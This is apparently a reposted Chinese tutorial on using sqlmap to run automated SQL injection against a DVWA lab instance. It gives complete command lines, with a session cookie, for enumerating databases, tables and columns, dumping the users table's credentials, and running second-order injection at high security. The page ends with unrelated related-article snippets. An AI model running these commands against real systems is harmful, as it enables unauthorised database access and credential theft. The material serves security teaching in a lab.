Sqlmap自动化注入的示例分析

Sqlmap自动化注入的示例分析

使用sqlmap对dvwa进行自动化注入
设置dvwa级别为low

  1. 打开dvwa的SQL Injection(SQL Injection (Blind)),打开浏览器调试,输入user id并submit,查看拦截到的请求。

  2. 可以看到是一条GET请求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

  3. 我们直接放到salmap测试一下,使用-u命令 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#”

  4. 可以看到这里是需要登录的,否则跑不出来。所以我们需要添加一个cookie维持登录

6.使用burp suite代理抓包,获取登录的cookie,添加–dbs 爆数据 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” — cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” –dbs

可以看到爆出来的数据库是mysql

7. 我们用-D xxx指定查看的数据库,用–tables查看该数据库的所有表:-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa –tables

查看跑出来的结果:

8.我们用-D xxx -T ttt指定查看的表,用–columns查看表的列

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users –columns

9.我们用-D xxx查看数据库, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的数据

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users -C password,user –dump

  • 将dvwa安全等级调为medium将抓取的数据包保存为.txt文件,放到sqlmap的目录下,直接-r 文件名 –dbs(后续的参数自己添加即可)

  • 将dvwa 安全等级调为high。由于这次的提交页面跟返回结果的页面不是同一个页面,所以之前的那种方法在这里不能用了。要使用二阶注入的方法

  • 提交数据的网址

  • 返回的网址

将抓取的数据包保存为.txt文件,放到sqlmap的目录下,爆数据库,命令: -r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 –dbs

爆表名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” – -batch –level 2 -D dvwa –tables

爆列名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/”

— batch –level 2 -D dvwa -T user –columns

爆字段数据

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 -D dvwa -T users -C user,password –dump

  • 一些概念问题:

  • 二阶注入:二阶sql注入–second-order有些时候注入点输入的数据看返回结果的时候并不是 当前的页面,而是另外的一个页面, 这时候就需要你指定到哪个页面获取响应判断真假。–second-url 后面跟一个返回的页面的URL地址

  • –batch:自动默认配置,不用手动按yes or no

  • level :Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload非常多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5(速度也随之变慢)

以上就是Sqlmap自动化注入的示例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

文章标题:Sqlmap自动化注入的示例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/26232

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云
上一篇 2022年9月16日 下午10:42
下一篇 2022年9月16日 下午10:43

相关推荐

  • 数据库加密有什么用

    数据库加密的主要用途包括:保护数据的安全性、防止未经授权的访问、满足法规要求、防止数据泄露、保证数据的完整性和可靠性。数据库加密是一种安全策略,它可以确保存储在数据库中的敏感信息不被未经授权的用户访问。如果没有正确的密钥,即使数据被盗,也无法解读加密的信息,从而极大地增强了数据的安全性。此外,数据库…

    2024年7月16日
    700
  • 数据库跳板是什么意思

    数据库跳板是一种在网络安全领域常见的术语,是指黑客通过某个已经被控制的数据库,跳转到其他的数据库或系统,以此进行进一步的攻击行为。具体来说,数据库跳板包括以下几个步骤:一、黑客首先找到一个安全漏洞较多、比较容易攻击的数据库,然后利用各种手段将其控制;二、控制后,黑客会在此数据库中植入恶意代码,使其成…

    2024年7月16日
    500
  • 数据库实现了些什么功能

    数据库实现了数据存储、数据检索、数据管理、数据完整性、数据安全、并发控制、备份与恢复等功能。在这些功能中,数据存储是最基础的功能,因为所有的数据操作都依赖于数据存储这一核心功能。数据存储确保了数据的持久化,能够在需要时进行读取和操作,而不会因为系统关闭或故障而丢失数据。数据库系统通过高效的数据存储机…

    2024年7月16日
    300
  • 电信数据库都做些什么工作

    电信数据库的主要工作包括数据存储、数据管理、数据分析、数据安全、数据备份和恢复、数据集成和数据挖掘。数据存储是其核心功能之一,确保大量用户信息、通话记录、账单数据等能够高效、安全地存储。数据管理涉及对这些数据的组织和维护,确保数据的准确性和一致性。数据分析则通过大数据技术对存储的信息进行深度挖掘,帮…

    2024年7月16日
    400
  • 启动数据库用什么软件好

    启动数据库,我们可以选择多种不同的软件,比如MySQL、Oracle、SQL Server、PostgreSQL、MongoDB、SQLite等。每种数据库软件都有其独特的特性和适应的应用场景。例如,MySQL是最受欢迎的关系数据库管理系统,它具有开源、性能高效、成本低、可扩展性好等优点,被广泛应用…

    2024年7月16日
    300
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部